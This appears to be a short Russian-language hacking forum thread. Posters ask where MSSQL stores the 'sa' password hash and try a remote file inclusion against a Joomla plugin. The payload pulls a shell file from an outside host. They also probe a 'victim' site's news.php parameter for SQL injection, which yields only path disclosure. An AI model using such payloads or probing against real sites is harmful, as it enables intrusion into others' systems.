Всем привет... подскажите, где в mssql хранятся пароли пользователя sa? и какой у них тип... ну и как шифруется?

Спасибо!

Есть занятная RFI в жумле. Пытаюсь поюзать:

mosConfig_absolute_path=http://****.ru/sh.txt?

Чего-то не понял на счет первого. allow_url_fopen включенный\выключенный=не работает.

Закрыта бага значит :facepalm:

Дык, старая версия плагина и с багой.

Ну вот скажи мне, какая разница между версиями плагина?

Джумла устроена так, что сторонние компоненты лотаются довольно просто, добавлением строчки в начало бажного скрипта:

Удалил строчку. Терь ошибки вылетают.

Имеется жертва с http://localhost/news.php?do=news&page=2&, Все что следует после 2 обрубается, при подстановке page не int значения или просто пустое выражение вылетает File: /var/www/localhost/news.php

Line: 33

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 1

Я так понимаю кроме расрытие путей это ничего не дает?

Да, GET-параметро обрабатываеться intval'ом и ничего кроме цифр не пускает. А из-за того, что параметр остается пустой, то SQL-запрос становиться невалидный и вылетает ошибка.